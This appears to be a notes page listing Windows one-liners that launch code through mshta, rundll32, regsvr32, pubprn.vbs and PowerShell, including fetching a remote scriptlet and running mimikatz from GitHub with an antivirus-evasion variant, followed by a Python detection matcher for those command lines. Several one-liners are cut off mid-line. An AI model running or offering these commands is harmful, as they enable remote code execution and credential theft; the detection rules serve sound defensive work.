
Some fun one-liners to start a script:

mshta.exe vbscript:GetObject("script:https://server/sct")(window.close)
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject('WScript.Shell');w.Exec('calc')");

#runs mimikatz straight from GitHub
invoke-expression (Invoke-WebRequest -Uri;invoke-mimikatz

#runs mimikatz with split-up custom version to evade antivirus
invoke-expression (Invoke-WebRequest -Uri;invoke-bananas

#starts calc
regsvr32 /u /n /s /i: scrobj.dll

#starts powershell that runs mimikatz
regsvr32 /u /n /s /i: scrobj.dll

#start calc -
powershell -ep bypass -nop -c "powershell . ((nslookup.exe -q=txt ))[5]"

#run calc via vbs
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs blah "script:
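
Seen from the detection side, each of the one-liners above leaves a recognisable process command line. The following matcher is an added example, not part of the original page; the rule names, the `classify` helper and the `example.invalid` sample lines are constructed for illustration, and the patterns are a starting point rather than a complete rule set.

```python
import re

# (rule name, regex over the normalised command line). Each pattern mirrors one
# of the one-liner shapes listed on this page; names are hypothetical.
RULES = [
    ("mshta_script_moniker",
     r"\bmshta(\.exe)?\b.*\b(vbscript|javascript):.*getobject\(\s*[\"']script:"),
    ("rundll32_mshtml_runhtmlapplication",
     r"\brundll32(\.exe)?\b.*javascript:.*mshtml(\.dll)?\s*,\s*runhtmlapplication"),
    ("regsvr32_scrobj_scriptlet",
     r"\bregsvr32(\.exe)?\b.*[/-]i:.*\bscrobj(\.dll)?\b"),
    ("pubprn_script_moniker",
     r"\bpubprn\.vbs\b.*\bscript:"),
    ("powershell_nslookup_txt",
     r"\b(powershell|pwsh)(\.exe)?\b.*\bnslookup(\.exe)?\s+-(q|querytype|type)=txt\b"),
    ("powershell_download_and_invoke",
     r"\b(invoke-expression|iex)\b.*\b(invoke-webrequest|iwr|downloadstring)\b"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]


def normalise(cmdline: str) -> str:
    """Strip cmd.exe caret escapes and collapse whitespace before matching."""
    return re.sub(r"\s+", " ", cmdline.replace("^", "")).strip()


def classify(cmdline: str) -> list:
    """Return the names of all rules whose pattern matches the command line."""
    text = normalise(cmdline)
    return [name for name, rx in COMPILED if rx.search(text)]


# Sample command lines: the first and third are taken from this page, the rest
# are constructed (placeholder host example.invalid, plus two benign controls).
SAMPLES = [
    r'''mshta.exe vbscript:GetObject("script:https://server/sct")(window.close)''',
    r'''regsvr32 /u /n /s /i:https://example.invalid/a.sct scrobj.dll''',
    r'''powershell -ep bypass -nop -c "powershell . ((nslookup.exe -q=txt ))[5]"''',
    r'''r^egsvr32 /s   /i:https://example.invalid/a.sct scrobj.dll''',
    r'''regsvr32 /s C:\Windows\System32\scrobj.dll''',
    r'''nslookup -q=txt example.com''',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or ["-"], "|", line)
```

Feed it the command-line field of process-creation events, for example Sysmon Event ID 1 or Windows Security event 4688 with command-line auditing enabled.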

phishing docs